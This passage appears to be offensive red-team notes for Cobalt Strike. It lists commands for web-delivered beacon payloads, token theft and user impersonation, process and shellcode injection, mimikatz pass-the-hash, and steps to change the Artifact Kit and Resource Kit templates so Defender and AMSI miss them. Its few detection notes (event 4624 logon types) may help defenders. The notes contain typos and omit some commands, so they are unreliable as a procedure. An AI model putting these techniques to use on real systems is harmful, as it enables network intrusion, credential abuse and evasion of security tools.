`Attacks -> Web Drive-by -> Scripted Web Delivery (S)` This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python
If you already has the file you want to host in a web sever just go to `Attacks -> Web Drive-by -> Host File` and select the file to host and web server config.
make_token [DOMAIN\user] [password] #Create token to impersonate a user in the network
ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
rev2self # Stop using token generated with make_token
## The use of make_token generates event 4624: An account was successfully logged on. This event is very common in a Windows domain, but can be narrowed down by filtering on the Logon Type. As mentioned above, it uses LOGON32_LOGON_NEW_CREDENTIALS which is type 9.
## Like make_token but stealing the token from a process
steal_token [pid] # Also, this is useful for network actions, not local actions
## From the API documentation we know that this logon type "allows the caller to clone its current token". This is why the Beacon output says Impersonated <current_username> - it's impersonating our own cloned token.
ls \\computer_name\c$ # Try to use generated token to access C$ in a computer
rev2self # Stop using token from steal_token
##Launch process with nwe credentials
spawnas [domain\username] [password] [listener] #Do it from a directory with read access like: cd C:\
## Like make_token, this will generate Windows event 4624: An account was successfully logged on but with a logon type of 2 (LOGON32_LOGON_INTERACTIVE). It will detail the calling user (TargetUserName) and the impersonated user (TargetOutboundUserName).
## Inject into process
inject [pid] [x64|x86] [listener]
## From an OpSec point of view: Don't perform cross-platform injection unless you really have to (e.g. x86 -> x64 or x64 -> x86).
## Pass the hash
## This modification process requires patching of LSASS memory which is a high-risk action, requires local admin privileges and not all that viable if Protected Process Light (PPL) is enabled.
## Withuot /run, mimikatz spawn a cmd.exe, if you are running as a user with Desktop, he will see the shell (if you are running as SYSTEM you are good to go)
steal_token <pid> #Steal token from process created by mimikatz
shinject <pid> x64 C:\Payloads\msf.bin #Inject metasploit shellcode in a x64 process
# Pass metasploit session to cobalt strike
## Fenerate stageless Beacon shellcode, go to Attacks > Packages > Windows Executable (S), select the desired listener, select Raw as the Output type and select Use x64 payload.
Usually in `/opt/cobaltstrike/artifact-kit` you can find the code and pre-compiled templates (in `/src-common`) of the payloads that cobalt strike is going to use to generate the binary beacons.
Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the generated backdoor (or just with the compiled template) you can find what is making defender trigger. It's usually a string. Therefore you can just modify the code that is generating the backdoor so that string doesn't appear in the final binary.
After modifying the code just run `./build.sh` from the same directory and copy the `dist-pipe/` folder into the Windows client in `C:\Tools\cobaltstrike\ArtifactKit`.
Don't forget to load the aggressive script `dist-pipe\artifact.cna` to indicate Cobalt Strike to use the resources from disk that we want and not the ones loaded.
### Resource Kit
The ResourceKit folder contains the templates for Cobalt Strike's script-based payloads including PowerShell, VBA and HTA.
Using [ThreatCheck](https://github.com/rasta-mouse/ThreatCheck) with the templates you can find what is defender (AMSI in this case) not liking and modify it:
Modifying the detected lines one can generate a template that won't be caught.
Don't forget to load the aggressive script `ResourceKit\resources.cna` to indicate Cobalt Strike to luse the resources from disk that we want and not the ones loaded.